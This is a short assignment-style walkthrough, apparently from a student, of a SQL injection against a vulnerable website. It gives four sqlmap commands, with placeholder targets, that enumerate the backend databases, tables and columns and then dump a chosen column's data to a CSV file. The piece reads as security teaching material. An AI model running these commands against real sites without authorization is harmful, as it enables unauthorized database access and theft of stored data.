In this following assignment we will conduct a SQL injection on a vulnurable website.

In the first step we are going to use this command to scan the website and show the database that is being used at the backend.
"sqlmap <website link with get query> --dbs"

In the second step we are going to use this command to return us all the tables inside the specified database.
"sqlmap <website link with get query> -D <db name> --tables"

In the third step we are going to use the command to scan the specified table and return all the columns inside.
"sqlmap <website link with get query> -D <db name> -T <table name> --columns"


In the fourth step we are going to use the command to scan the column that is specified and will dump all the data in that file to a csv file.
"sqlmap <website link with get query> -D <db name> -T <table name> -C <column name> --dump"
